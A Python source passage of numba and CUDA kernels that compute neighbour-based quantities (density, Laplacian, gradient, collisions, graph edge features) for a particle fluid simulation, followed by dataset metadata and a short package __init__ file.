cell_fst[cell_idx] = i
else:
cell_next[j] = i
return cell_fst, cell_next
@nb.njit(parallel=True)
def get_p_in_cell(pos, ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius):
p_in_cell = -np.ones((pos.shape[0], ), dtype=np.int32)
cell_len = control_radius * 1.05
for i in nb.prange(ids.shape[0]):
idx = ids[i]
p_in_cell[idx] = 1
ix = int((pos[idx, 0] - min_x) / cell_len) + 1
iy = int((pos[idx, 1] - min_y) / cell_len) + 1
iz = int((pos[idx, 2] - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
rx = pos[j, 0] - pos[idx, 0]
ry = pos[j, 1] - pos[idx, 1]
rz = pos[j, 2] - pos[idx, 2]
dist = math.sqrt(rx**2 + ry**2 + rz**2)
if dist < control_radius:
p_in_cell[j] = 1
j = cell_next[j]
if j == -1:
break
return p_in_cell
@nb.njit
def stack_col_feature(attr_arr, idx_arr, tot_size):
v = np.zeros((tot_size, 6), dtype=np.float32)
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
for n in range(6):
v[count, n] = attr_arr[row, 6*j + n]
count += 1
assert (count == tot_size)
return i, v
@nb.njit
def stack_edge_idx(idx_arr, tot_size):
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
count += 1
assert (count == tot_size)
return i
@nb.njit
def stack_gns_feature(attr_arr, idx_arr, tot_size):
v = np.zeros((tot_size, 4), dtype=np.float32)
i = np.zeros((tot_size, 2), dtype=np.int64)
count = 0
for row in range(idx_arr.shape[0]):
neighbor_num = idx_arr[row, 0]
for j in range(1, neighbor_num + 1):
col = idx_arr[row, j]
i[count] = np.array([row, col])
for n in range(4):
v[count, n] = attr_arr[row, 4*j + n]
count += 1
assert (count == tot_size)
return i, v
@cuda.jit
def cu_get_laplacian(lap_val, lap_idx, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num :
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
center_sum += w
col = i2row[j]
if col != -1:
lap_idx[row, 0] += 1
cursor = lap_idx[row, 0]
lap_val[row, cursor] = -w
lap_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
lap_idx[row, 0] += 1
cursor = lap_idx[row, 0]
lap_val[row, cursor] = center_sum
lap_idx[row, cursor] = row
@cuda.jit
def cu_get_density(density, ptype, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num :
if check_in_range(pos, boundary, i) and ptype[i] != 3:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
rx = pos[i, 0] - pos[j, 0]
ry = pos[i, 1] - pos[j, 1]
rz = pos[i, 2] - pos[j, 2]
dist = math.sqrt(rx ** 2 + ry ** 2 + rz ** 2)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
center_sum += w
j = cell_next[j]
if j == -1:
break
density[i] = center_sum
@cuda.jit
def cu_get_gradient(gradient, grad_val, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
val_min = grad_val[i]
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius:
neigh_val = grad_val[j]
if val_min > neigh_val:
val_min = neigh_val
j = cell_next[j]
if j == -1:
break
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
val_diff = grad_val[j] - val_min
w *= val_diff / r_2
gradient[3*row] += w * r_vec_x
gradient[3*row + 1] += w * r_vec_y
gradient[3*row + 2] += w * r_vec_z
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_collision(vel, pos, ptype, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
if check_in_range(pos, boundary, i) and ptype[i] == 1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
vx, vy, vz = vel[i, 0], vel[i, 1], vel[i, 2]
vx_temp, vy_temp, vz_temp = vx, vy, vz
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
if j != i and ptype[j] != 3:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius:
fdt = (vx - vel[j, 0]) * r_vec_x +\
(vy - vel[j, 1]) * r_vec_y +\
(vz - vel[j, 2]) * r_vec_z
if fdt > 0.0:
fdt *= (1.0 + COL_COEF) * 0.5 / r_2
vx_temp -= r_vec_x * fdt
vy_temp -= r_vec_y * fdt
vz_temp -= r_vec_z * fdt
j = cell_next[j]
if j == -1:
break
vel[i, 0] = vx_temp
vel[i, 1] = vy_temp
vel[i, 2] = vz_temp
pos[i, 0] += (vx_temp - vx) * DT
pos[i, 1] += (vy_temp - vy) * DT
pos[i, 2] += (vz_temp - vz) * DT
@cuda.jit
def cu_get_gcn_average(gcn_val, gcn_idx, i2row, pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
center_sum = 0.
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
dist = distance(pos, i, j)
if dist < control_radius and j != i:
w = weight(dist, control_radius)
col = i2row[j]
if col != -1:
center_sum += w
gcn_idx[row, 0] += 1
cursor = gcn_idx[row, 0]
gcn_val[row, cursor] = w
gcn_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
gcn_idx[row, 0] += 1
cursor = gcn_idx[row, 0]
gcn_val[row, cursor] = 1
gcn_idx[row, cursor] = row
col_num = cursor
for n in range(1, col_num):
gcn_val[row, n] /= center_sum
@cuda.jit
def cu_get_col_feature(edge_attr, edge_idx, vel, pos, i2row, ptype,
cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1 and ptype[i] == 1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = rx - pos[j, 0]
r_vec_y = ry - pos[j, 1]
r_vec_z = rz - pos[j, 2]
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
col = i2row[j]
if dist < control_radius and j != i and col != -1:
v_vec_x = vel[i, 0] - vel[j, 0]
v_vec_y = vel[i, 1] - vel[j, 1]
v_vec_z = vel[i, 2] - vel[j, 2]
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_attr[row, 6*cursor] = v_vec_x
edge_attr[row, 6*cursor + 1] = r_vec_x/dist
edge_attr[row, 6*cursor + 2] = v_vec_y
edge_attr[row, 6*cursor + 3] = r_vec_y/dist
edge_attr[row, 6*cursor + 4] = v_vec_z
edge_attr[row, 6*cursor + 5] = r_vec_z/dist
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_gns_feature(edge_attr, edge_idx, pos, i2row, ptype,
cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and row != -1 and ptype[i] == 1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = rx - pos[j, 0]
r_vec_y = ry - pos[j, 1]
r_vec_z = rz - pos[j, 2]
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
col = i2row[j]
if dist < control_radius and j != i and col != -1:
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_attr[row, 4*cursor] = r_vec_x
edge_attr[row, 4*cursor + 1] = r_vec_y
edge_attr[row, 4*cursor + 2] = r_vec_z
edge_attr[row, 4*cursor + 3] = dist
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_divergence(divergence, div_val, ptype,
pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
if check_in_range(pos, boundary, i) and ptype[i] == 1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i and ptype[j] != 3:
w = weight(dist, control_radius)
partial_x = r_vec_x * (div_val[j, 0] - div_val[i, 0])
partial_y = r_vec_y * (div_val[j, 1] - div_val[i, 1])
partial_z = r_vec_y * (div_val[j, 2] - div_val[i, 2])
div = w*(partial_x + partial_y + partial_z) / r_2
divergence[i] += div
j = cell_next[j]
if j == -1:
break
@cuda.jit
def cu_get_edge_idx(edge_idx, ptype, i2row,
pos, cell_fst, cell_next, boundary,
control_radius, nx, nxy, tot_num):
i = cuda.blockIdx.x * cuda.blockDim.x + cuda.threadIdx.x
if i < tot_num:
row = i2row[i]
if check_in_range(pos, boundary, i) and ptype[i] == 1 and row != -1:
# identify the cell particle locate in
cell_len = control_radius * 1.05
min_x, min_y, min_z = boundary[1], boundary[3], boundary[5]
rx, ry, rz = pos[i, 0], pos[i, 1], pos[i, 2]
ix = int((rx - min_x) / cell_len) + 1
iy = int((ry - min_y) / cell_len) + 1
iz = int((rz - min_z) / cell_len) + 1
for jz in range(iz - 1, iz + 2):
for jy in range(iy - 1, iy + 2):
for jx in range(ix - 1, ix + 2):
cell_idx_j = jz * nxy + jy * nx + jx
j = cell_fst[cell_idx_j]
col = i2row[j]
if j == -1:
continue
while True:
r_vec_x = pos[j, 0] - rx
r_vec_y = pos[j, 1] - ry
r_vec_z = pos[j, 2] - rz
r_2 = r_vec_x ** 2 + r_vec_y ** 2 + r_vec_z ** 2
dist = math.sqrt(r_2)
if dist < control_radius and j != i and col != -1:
edge_idx[row, 0] += 1
cursor = edge_idx[row, 0]
edge_idx[row, cursor] = col
j = cell_next[j]
if j == -1:
break
@nb.njit
def gen_i2row_map(ids, tot_num):
i2row = - np.ones((tot_num,), dtype=np.int32)
row = 0
for i in range(ids.shape[0]):
idx = ids[i]
i2row[idx] = row
row += 1
return i2row
@nb.njit
def find_min_max(val, h):
min_ = 1e10
max_ = -1e10
for i in range(val.shape[0]):
if min_ > val[i]:
min_ = val[i]
if max_ < val[i]:
max_ = val[i]
return (min_ - 2*h), (max_ + 2*h)
def calc_cell_params(pos, ptype, control_radius):
cell_len = control_radius * 1.05
fluid_pos = pos[ptype == 1]
x_min, x_max = find_min_max(fluid_pos[:, 0], cell_len)
y_min, y_max = find_min_max(fluid_pos[:, 1], cell_len)
z_min, z_max = find_min_max(fluid_pos[:, 2], cell_len)
# boundary position
bound = np.array(
[x_max, x_min, y_max, y_min, z_max, z_min], dtype=np.float32)
# calculate the cell number along different axis
nx, ny, nz = \
int((x_max - x_min)/cell_len) + 3, int((y_max - y_min)/cell_len) + 3, int((z_max - z_min)/cell_len) + 3
nxy, nxyz = nx * ny, nx * ny * nz
return nx, nxy, nxyz, bound
def get_laplacian_cuda(pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_laplacian"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
lap_val = np.zeros((len(ids), 384), dtype=np.float32)
lap_idx = np.zeros((len(ids), 384), dtype=np.int32)
d_lap_val = cuda.to_device(lap_val)
d_lap_idx = cuda.to_device(lap_idx)
cu_get_laplacian[blocks_pg, threads_pb](d_lap_val, d_lap_idx, d_i2row,
d_pos, d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_lap_idx = cp.asarray(d_lap_idx)
tot_size = cp.sum(cp_lap_idx[:, 0], axis=0).item()
count = cp.cumsum(cp_lap_idx[:, 0], axis=0)
lap_val = d_lap_val.copy_to_host()
lap_idx = d_lap_idx.copy_to_host()
count = cp.asnumpy(count)
return lap_val, lap_idx, tot_size, count
def get_density_cuda(pos, ptype, control_radius):
# python host wrapper for cuda kernel function "cu_get_density"
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
density = np.zeros((tot_num, ), dtype=np.float32)
d_density = cuda.to_device(density)
cu_get_density[blocks_pg, threads_pb](d_density, d_ptype, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
density = d_density.copy_to_host()
return density
def get_gradient_cuda(grad_val, pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_gradient"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
d_grad_val = cuda.to_device(grad_val)
gradient = np.zeros((len(ids) * 3), dtype=np.float32)
d_gradient = cuda.to_device(gradient)
cu_get_gradient[blocks_pg, threads_pb](d_gradient, d_grad_val, d_i2row, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
gradient = d_gradient.copy_to_host().reshape(-1, 3)
return gradient
def get_collision_cuda(vel, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_vel = cuda.to_device(vel)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
cu_get_collision[blocks_pg, threads_pb](d_vel, d_pos, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
vel = d_vel.copy_to_host()
pos = d_pos.copy_to_host()
return vel, pos
def get_gcn_average_cuda(pos, ptype, ids, control_radius):
# python host wrapper for cuda kernel function "cu_get_gcn_average"
d_pos = cuda.to_device(pos)
tot_num = pos.shape[0]
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
gcn_val = np.zeros((len(ids), 384), dtype=np.float32)
gcn_idx = np.zeros((len(ids), 384), dtype=np.int32)
d_gcn_val = cuda.to_device(gcn_val)
d_gcn_idx = cuda.to_device(gcn_idx)
cu_get_gcn_average[blocks_pg, threads_pb](d_gcn_val, d_gcn_idx, d_i2row,
d_pos, d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
if len(ids) > 1:
cp_gcn_idx = cp.asarray(d_gcn_idx[:, 0])
tot_size = cp.sum(cp_gcn_idx).item()
else:
tot_size = d_gcn_idx.copy_to_host()[0, 0]
gcn_val = d_gcn_val.copy_to_host()
gcn_idx = d_gcn_idx.copy_to_host()
return gcn_val, gcn_idx, tot_size
def get_collision_feature_cuda(vel, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_vel = cuda.to_device(vel)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
fluid_ids = np.argwhere(ptype == 1).reshape(-1,)
min_x, min_y, min_z = cell_bound[1], cell_bound[3], cell_bound[5]
p_in_cell = get_p_in_cell(pos, fluid_ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius)
p_in_cell = np.argwhere(p_in_cell == 1).astype(np.int32).reshape(-1,)
i2row = gen_i2row_map(p_in_cell, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
edge_attr = np.zeros((len(p_in_cell), 6*64), dtype=np.float32)
edge_idx = np.zeros((len(p_in_cell), 64), dtype=np.int32)
d_edge_attr = cuda.to_device(edge_attr)
d_edge_idx = cuda.to_device(edge_idx)
cu_get_col_feature[blocks_pg, threads_pb](d_edge_attr, d_edge_idx, d_vel, d_pos, d_i2row, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_attr_arr = d_edge_attr.copy_to_host()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx, edge_attr = stack_col_feature(edge_attr_arr, edge_idx_arr, tot_size)
edge_attr = edge_attr
return edge_attr, edge_idx, p_in_cell
def get_gns_feature_cuda(pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
fluid_ids = np.argwhere(ptype == 1).reshape(-1,)
min_x, min_y, min_z = cell_bound[1], cell_bound[3], cell_bound[5]
p_in_cell = get_p_in_cell(pos, fluid_ids, cell_fst, cell_next, min_x, min_y, min_z, nxy, nx, control_radius)
p_in_cell = np.argwhere(p_in_cell == 1).astype(np.int32).reshape(-1,)
i2row = gen_i2row_map(p_in_cell, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
edge_attr = np.zeros((len(p_in_cell), 4*128), dtype=np.float32)
edge_idx = np.zeros((len(p_in_cell), 128), dtype=np.int32)
d_edge_attr = cuda.to_device(edge_attr)
d_edge_idx = cuda.to_device(edge_idx)
cu_get_gns_feature[blocks_pg, threads_pb](d_edge_attr, d_edge_idx, d_pos, d_i2row, d_ptype,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_attr_arr = d_edge_attr.copy_to_host()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx, edge_attr = stack_gns_feature(edge_attr_arr, edge_idx_arr, tot_size)
edge_attr = edge_attr
return edge_attr, edge_idx, p_in_cell
def get_vel_div_cuda(vel, pos, ptype, control_radius):
d_vel = cuda.to_device(vel)
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
divergence = np.zeros((tot_num, ), dtype=np.float32)
d_divergence = cuda.to_device(divergence)
cu_get_divergence[blocks_pg, threads_pb](d_divergence, d_vel, d_ptype, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
divergence = d_divergence.copy_to_host()
return divergence
def get_edge_idx_cuda(ids, pos, ptype, control_radius):
d_pos = cuda.to_device(pos)
d_ptype = cuda.to_device(ptype)
tot_num = pos.shape[0]
threads_pb = (THREADS, 1, 1)
blocks_pg = (int(tot_num / THREADS) + 1, 1, 1)
nx, nxy, nxyz, cell_bound = calc_cell_params(pos, ptype, control_radius)
d_cell_bound = cuda.to_device(cell_bound)
cell_fst, cell_next = cell_sort(pos, cell_bound, control_radius, nx, nxy, nxyz, tot_num)
i2row = gen_i2row_map(ids, tot_num)
d_i2row = cuda.to_device(i2row)
d_cell_fst = cuda.to_device(cell_fst)
d_cell_next = cuda.to_device(cell_next)
if 1.9*BASE_RADIUS >= control_radius >= 1.0*BASE_RADIUS:
row_len = 64
elif 0.0 < control_radius < 1.0*BASE_RADIUS:
row_len = 32
elif 3.1*BASE_RADIUS > control_radius > 1.9*BASE_RADIUS:
row_len = 384
else:
raise Exception('Unsupported control radius')
edge_idx = np.zeros((len(ids), row_len), dtype=np.int32)
d_edge_idx = cuda.to_device(edge_idx)
cu_get_edge_idx[blocks_pg, threads_pb](d_edge_idx, d_i2row, d_ptype, d_pos,
d_cell_fst, d_cell_next, d_cell_bound,
control_radius, nx, nxy, tot_num)
cp_edge_idx = cp.asarray(d_edge_idx[:, 0])
tot_size = cp.sum(cp_edge_idx).item()
edge_idx_arr = d_edge_idx.copy_to_host()
edge_idx = stack_edge_idx(edge_idx_arr, tot_size)
return edge_idx | 42.319058 | 113 | 0.478698 | 5,568 | 39,526 | 3.128592 | 0.034842 | 0.063433 | 0.044087 | 0.029966 | 0.824455 | 0.786108 | 0.760505 | 0.74271 | 0.729908 | 0.723249 | 0 | 0.031706 | 0.415094 | 39,526 | 934 | 114 | 42.319058 | 0.721787 | 0.016495 | 0 | 0.710292 | 0 | 0 | 0.002716 | 0 | 0 | 0 | 0 | 0 | 0.003812 | 1 | 0.041931 | false | 0 | 0.008895 | 0 | 0.080051 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
04b2cb504a110378621f6f4acb4f7c140ef547a5 | 106 | py | Python | lppydsmc/data_structures/__init__.py | Quettle/lppydsmc | 37290792e845086f7ea182d81f284d68b6cdcbea | [
"MIT"
] | null | null | null | lppydsmc/data_structures/__init__.py | Quettle/lppydsmc | 37290792e845086f7ea182d81f284d68b6cdcbea | [
"MIT"
] | null | null | null | lppydsmc/data_structures/__init__.py | Quettle/lppydsmc | 37290792e845086f7ea182d81f284d68b6cdcbea | [
"MIT"
] | null | null | null | from . import grid
from .grid import Grid
from .container import Container
from .particle import Particle
